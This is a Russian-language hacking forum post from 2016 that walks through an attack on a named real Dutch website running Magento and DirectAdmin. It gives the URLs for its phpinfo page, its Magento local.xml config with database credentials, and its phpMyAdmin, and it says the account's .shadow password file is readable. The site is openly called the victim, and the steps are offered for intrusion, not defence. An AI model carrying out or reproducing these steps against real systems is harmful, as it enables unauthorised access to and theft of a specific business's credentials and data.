Показать сообщение отдельно

  #3  
Старый 10.09.2016, 21:36
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами: 10095779

Репутация: 137
По умолчанию

вот пример на Magento+DirectAdmin

жертва: https://www.smitsarnhem.nl/

смотрим пхпинфо или ищем раскрытие путей

https://www.smitsarnhem.nl/phpinfo.php

_SERVER["DOCUMENT_ROOT"] /home/smitsarn/domains/smitsarnhem.nl/private_html

т.е smitsarnявляется нашим юзером, идем дальше...

http://194.247.31.208/~smitsarn/app/etc/local.xml читаем конфиг

phpmyadmin лежит по дефолту всегда:

http://194.247.31.208/phpMyAdmin/

https://www.smitsarnhem.nl/phpMyAdmin/

а дальше уже дело техник....

еще касяк, нам полностью доступна пака /home/%USERNAME%/ где /home/%USERNAME%/.shadow лежит пасс от аккаунта %USERNAME%
 
Ответить с цитированием